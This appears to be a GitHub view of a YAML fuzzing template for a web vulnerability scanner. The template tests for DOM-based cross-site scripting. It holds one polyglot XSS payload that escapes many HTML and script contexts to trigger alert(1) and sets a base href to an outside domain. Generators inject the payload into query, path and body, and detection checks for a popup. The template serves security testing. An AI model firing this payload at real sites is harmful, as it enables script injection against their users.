-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy pathpoliglot-xss.yaml
33 lines (27 loc) · 891 Bytes
/
poliglot-xss.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# info to search signature
id: fuzz-DOM-XSS
type: fuzz
info:
name: DOM Based XSS
risk: High
author: "@GochaOqradze", @BRuteLogic, @RodoAssis
# origin: gonna come from Burp
variables:
- prefix : |
#
payloads:
- JavaScript://%250Aalert?.(1)//\'/*\\'/*\\/*\"/*\\\"/*\`/*\\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\\76-->
requests:
#- method: GET
- engine: chrome
redirect: true
generators:
#Change exist content type or adding new one
#- Query("[[.original]]{{.payload}}")
- Query("{{.payload}}")
- Path("[[.original]]{{.payload}}", "last")
- Path("[[.original]]{{.prefix}}{{.payload}}", "last")
- Body ("{{.payload}}", "*")
detections:
- >-
HasPopUp()